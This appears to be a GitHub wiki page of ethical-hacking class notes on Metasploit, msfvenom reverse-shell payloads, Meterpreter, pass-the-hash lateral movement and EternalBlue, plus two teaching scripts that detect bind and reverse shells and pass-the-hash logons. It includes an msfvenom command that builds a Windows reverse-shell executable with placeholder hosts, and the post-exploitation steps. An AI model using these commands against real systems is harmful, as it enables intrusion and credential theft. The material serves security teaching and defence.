Class 6 ‐ Infrastructure Attacks - Justin-Boyd/Ethical-Hacking-Class GitHub Wiki

MetaSploit

MetaSploit Overview

  • Vulnerability – A weakness in a system that can be exploited
  • Payload – A piece of code that runs on the vulnerable system after it has been exploited
  • Exploit – The code that takes advantage of the vulnerability and delivers the payload to the vulnerable system

Search Engines

  • CVE Details – Searchable database of Common Vulnerabilities and Exposures
  • Exploit-DB – An archive that gathers public exploits, shellcode, and more
  • CVE List – The catalogue of CVE identifiers, which includes a large number of CVEs

SearchSploit

  • Command-line search tool for the Exploit-DB archive
  • Preinstalled in Kali Linux
  • Keeps a local copy of the archive that includes new exploits
  • Command: searchsploit [name]

SearchSploit Demonstration

  • Running searchsploit [name] searches the archive for matching entries.
  • To copy an exploit file into the current directory, run: searchsploit -m [path]
  • Change the script's permissions (for example with chmod +x) and run it.

MetaSploit Module Types

  • Exploits
  • Payloads
  • Auxiliaries
  • Encoders
  • Nops

MetaSploit Modules

  • ? – Displays all MetaSploit commands
  • show options – Displays the current module's settings
  • show info – Displays the module's documentation
  • show targets – Displays the targets the module supports

MetaSploit Module Setup

  • use [name] - Selects the module to be used
  • set RHOST [IP] - Sets the remote target IP address
  • set RPORT [port] - Sets the remote target port
  • set LHOST [IP] - Sets the local (listening) IP address
  • set LPORT [port] - Sets the local (listening) port number
  • exploit - Runs the exploit

MetaSploit

  • A framework for penetration testing.
  • Msfconsole is the integrated command-line interface for MetaSploit.
  • Includes additional modules that extend its capabilities.

MetaSploit Scanning

  • Scanning can be done by running nmap from within Msfconsole.
  • Msfconsole also provides a large variety of scanner modules.
  • Scan results are saved to the MetaSploit database.

Msfconsole Searching

  • search [term] searches across all modules.
  • use is the generic command for selecting a module, such as an exploit.
  • use [name] loads the named module as the module in use.

Reverse Shell

Common Shells

  • Telnet – Network protocol that sends data in plain text
  • Netcat – Tool for reading from and writing to raw network connections
  • SSH – Network protocol that sends data encrypted

Remote Shell Types

  • Bind Shell
    • The target listens on a port; the attacker connects to it to gain a remote shell.
  • Reverse Shell
    • The attacker runs a listener.
    • The target connects back to the listener and provides a shell.
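The two shell types above look different on the wire: a bind shell means a shell interpreter is listening for an inbound connection, while a reverse shell means a shell interpreter has dialled out. The following script, an added example written for these notes rather than code from the class, shows how a defender can tell them apart from a host's socket inventory. The record fields, the SHELL_PROCESSES list, the expected listening ports and the internal address ranges are all assumptions made for the example, and the sample inventory is constructed.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Interpreters an attacker typically attaches to a socket (constructed list).
SHELL_PROCESSES = {"cmd.exe", "powershell.exe", "sh", "bash", "dash", "zsh"}
# Ports a host is expected to listen on (assumption for the example).
EXPECTED_LISTEN_PORTS = {22, 80, 443, 3389}
# The organisation's own address ranges (assumption for the example).
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")]


@dataclass(frozen=True)
class SocketRecord:
    host: str         # host the record was collected from
    process: str      # image name that owns the socket
    state: str        # "LISTEN" or "ESTABLISHED"
    local_port: int
    remote_ip: str    # "" for a listening socket
    remote_port: int  # 0 for a listening socket


def is_internal(ip):
    """True if the peer address falls inside one of INTERNAL_NETS."""
    addr = ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def scan(records):
    """Return a list of (host, process, description) findings.

    Bind shell: a shell interpreter is LISTENing, or has accepted a
    connection on a port it is listening on, so the peer dialled in.
    Reverse shell: a shell interpreter holds an ESTABLISHED socket on a
    port this host is not listening on, so the shell dialled out.
    """
    listening = {(r.host, r.local_port) for r in records if r.state == "LISTEN"}
    findings = []
    for r in records:
        if r.process not in SHELL_PROCESSES:
            continue
        if r.state == "LISTEN":
            if r.local_port not in EXPECTED_LISTEN_PORTS:
                findings.append((r.host, r.process,
                                 f"possible bind shell (listening on {r.local_port})"))
        elif r.state == "ESTABLISHED":
            if (r.host, r.local_port) in listening:
                label = "possible bind shell (connection accepted)"
            else:
                label = "possible reverse shell (outbound connection)"
            where = "internal" if is_internal(r.remote_ip) else "external"
            findings.append((r.host, r.process,
                             f"{label}, {where} peer {r.remote_ip}:{r.remote_port}"))
    return findings


# Constructed sample inventory: a normal SSH daemon and session, a bind
# shell that has accepted a connection, and a reverse shell dialling out.
SAMPLE = [
    SocketRecord("ws01", "sshd", "LISTEN", 22, "", 0),
    SocketRecord("ws01", "sshd", "ESTABLISHED", 22, "10.0.0.5", 51022),
    SocketRecord("ws02", "cmd.exe", "LISTEN", 4444, "", 0),
    SocketRecord("ws02", "cmd.exe", "ESTABLISHED", 4444, "10.0.0.7", 50211),
    SocketRecord("ws03", "powershell.exe", "ESTABLISHED", 49712, "203.0.113.9", 443),
]

if __name__ == "__main__":
    for host, proc, desc in scan(SAMPLE):
        print(f"{host:6} {proc:16} {desc}")
```

The direction check is the key design point: a snapshot alone cannot say who connected to whom, so the script uses the host's own LISTEN entries to decide whether an established shell socket was accepted (bind) or initiated (reverse). Real telemetry also needs process ancestry, since a benign ssh session owns its sockets through sshd, not through the shell it spawns.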

MetaSploit Shells

  • MetaSploit can generate various kinds of shells.
  • Shell types include Bind Shell, Reverse Shell, and HTTP Tunnel Shell.
  • Meterpreter is MetaSploit's feature-rich, terminal-based payload.

Msfvenom

  • Payload-generation tool that ships with MetaSploit
  • Combines the functions of the older Msfpayload and Msfencode tools

Msfvenom Structure

  • Creating a basic payload:
    msfvenom -p windows/meterpreter/reverse_tcp LPORT=X LHOST=X.X.X.X -f exe > payload.exe
  1. msfvenom – the tool used to create the payload
  2. -p – the payload flag
  3. windows/meterpreter/reverse_tcp – the payload to be used
  4. LPORT=X – the port the listener waits on
  5. LHOST=X.X.X.X – the IP address of the listening host
  6. -f exe – the output file format flag and format
  7. > payload.exe – redirects the output to the named file

Msfvenom Output

  • Running the generated payload on the target produces a reverse shell back to the listener.

Msfvenom Options

  • Includes features to embed payloads in other files
  • Verifies that the payload matches the target platform and architecture
  • A non-encoded or non-obfuscated payload is easily detected by endpoint security

Remote Connection

  • A payload requires a listener to connect back to.
  • The listener is selected by running use multi/handler.
  • Configure the listener's settings to match the payload, then run exploit to start listening.

Automating Msfconsole

  • Msfconsole can be driven by automated resource scripts.
  • makerc [filename] saves the commands of the current session as a script.
  • A script can be loaded manually using msfconsole -r [file].

Meterpreter

  • getuid - Gets the name of the current user
  • pwd - Gets the current directory
  • ls/cd - Provide a means of navigating the file system
  • download [filename] - Downloads a file from the target's machine to the attacker's machine
  • sessions -i [id] - Chooses the session to interact with
  • background - Sends the current session to the background

Meterpreter Post Exploitation

  • Enables further actions on the target after a session has been obtained
  • Post modules are executed using run [module]
  • Can migrate to a different process to remain hidden

Protection Against Automated Tools

  • Update
    • Keep everything up to date.
  • Endpoint Security
    • Use antivirus protection.
  • Be Aware
    • Monitor systems and try to detect malicious activity.

Lateral Movement

  • Uses credentials obtained on one computer to gain access to another.
  • The same credentials are often reused by local accounts on several computers.

Finding the Target

  • Find out who is where.
    • Check which users are logged on to which machines in the network.
  • Find out who is an admin.
    • Which users have administrative privileges?
  • Find out who belongs to which group.
    • Study the group structure of the network.

Lateral Movement Automation

  • BloodHound
    • Used to display and analyse the collected information.
  • Neo4j
    • Back-end graph database used to store and query the collected data.

Lateral Movement Process

  • Escalate Permissions
    • Get the highest possible privileges on the current host.
  • List Members
    • Use those privileges to enumerate logged-on sessions and extract their hashes.
  • Dump Credentials
    • Dump the credentials found on the host.
  • PTH & PsExec
    • Execute Pass the Hash or PsExec attacks with the dumped credentials.
  • Repeat
    • Repeat the cycle on the next host if administrative access was not yet obtained.
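From the defender's side, the Pass the Hash and PsExec steps of this cycle leave traces in Windows event logs. The script below is an added example written for these notes, not code from the class: it runs two heuristics over a list of events and then looks for an account whose suspicious logons touch several computers, which is the signature of the "Repeat" step. The event records are constructed; field names follow the Windows event data names, the KeyLength/NtLmSsp pattern is a widely used heuristic that also matches some legitimate NTLM logons, and the administrative-share check on the service image path is an assumption about how PsExec-style tools drop their service binary.

```python
from collections import defaultdict


def looks_like_pass_the_hash(ev):
    """Heuristic: NTLM network logon (4624, type 3) with a 0-bit session key.
    Pass-the-hash tooling commonly leaves this pattern, but so can some
    legitimate NTLM logons, so a hit is a lead, not a verdict."""
    return (ev.get("EventID") == 4624
            and ev.get("LogonType") == 3
            and ev.get("AuthenticationPackageName") == "NTLM"
            and ev.get("LogonProcessName") == "NtLmSsp"
            and ev.get("KeyLength") == 0
            and not ev.get("TargetUserName", "").endswith("$"))  # ignore machine accounts


def looks_like_psexec(ev):
    """Heuristic: a service installed (System event 7045) either with the
    Sysinternals PsExec default name, or whose binary sits on an
    administrative share (assumed pattern for PsExec-style tools)."""
    if ev.get("EventID") != 7045:
        return False
    name = ev.get("ServiceName", "").upper()
    image = ev.get("ImagePath", "").lower()
    return name == "PSEXESVC" or "\\admin$\\" in image or "\\c$\\" in image


def find_lateral_movement(events, min_hosts=2):
    """Return (findings, spreading): per-event hits as (computer, label,
    detail) tuples, plus accounts whose suspicious logons touched at least
    `min_hosts` distinct computers, the hallmark of lateral movement."""
    findings = []
    hosts_by_account = defaultdict(set)
    for ev in events:
        if looks_like_pass_the_hash(ev):
            user = ev["TargetUserName"]
            findings.append((ev["Computer"], "possible pass-the-hash logon", user))
            hosts_by_account[user].add(ev["Computer"])
        elif looks_like_psexec(ev):
            findings.append((ev["Computer"], "PsExec-style service install",
                             ev.get("ServiceName", "")))
    spreading = {user: sorted(hosts) for user, hosts in hosts_by_account.items()
                 if len(hosts) >= min_hosts}
    return findings, spreading


# Constructed sample events (field names follow the Windows event data names).
SAMPLE_EVENTS = [
    # Ordinary NTLM network logon with a real session key: not flagged.
    {"Computer": "ws01", "EventID": 4624, "LogonType": 3, "TargetUserName": "alice",
     "AuthenticationPackageName": "NTLM", "LogonProcessName": "NtLmSsp", "KeyLength": 128},
    # Same account logging on to two hosts with the pass-the-hash pattern.
    {"Computer": "ws01", "EventID": 4624, "LogonType": 3, "TargetUserName": "bob",
     "AuthenticationPackageName": "NTLM", "LogonProcessName": "NtLmSsp", "KeyLength": 0},
    {"Computer": "ws02", "EventID": 4624, "LogonType": 3, "TargetUserName": "bob",
     "AuthenticationPackageName": "NTLM", "LogonProcessName": "NtLmSsp", "KeyLength": 0},
    # Kerberos logon: not NTLM, not flagged.
    {"Computer": "ws02", "EventID": 4624, "LogonType": 3, "TargetUserName": "carol",
     "AuthenticationPackageName": "Kerberos", "LogonProcessName": "Kerberos", "KeyLength": 0},
    # Machine-account NTLM logon with KeyLength 0: excluded by the $ check.
    {"Computer": "ws03", "EventID": 4624, "LogonType": 3, "TargetUserName": "WS04$",
     "AuthenticationPackageName": "NTLM", "LogonProcessName": "NtLmSsp", "KeyLength": 0},
    # Sysinternals PsExec default service name.
    {"Computer": "ws02", "EventID": 7045, "ServiceName": "PSEXESVC",
     "ImagePath": "%SystemRoot%\\PSEXESVC.exe"},
    # Randomly named service whose binary sits on the ADMIN$ share.
    {"Computer": "ws03", "EventID": 7045, "ServiceName": "qzhtk",
     "ImagePath": "\\\\127.0.0.1\\ADMIN$\\qzhtk.exe"},
]

if __name__ == "__main__":
    hits, spread = find_lateral_movement(SAMPLE_EVENTS)
    for hit in hits:
        print(*hit)
    print("accounts spreading across hosts:", spread)
```

The per-event checks on their own are noisy; the correlation in find_lateral_movement is what turns them into something worth paging on, because a single account producing hash-style logons on two or more machines in quick succession is exactly the "Repeat" loop the notes describe.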

Finding the Target: EternalBlue

  • One of the most common exploits
  • Works on unpatched Windows 7 SP1
  • Gives the attacker a remote shell on the target

EternalBlue Exploit

  • The attacker identifies the target's OS and version.
  • The attacker loads the module and selects a payload.
  • The attacker executes the exploit and obtains a remote shell.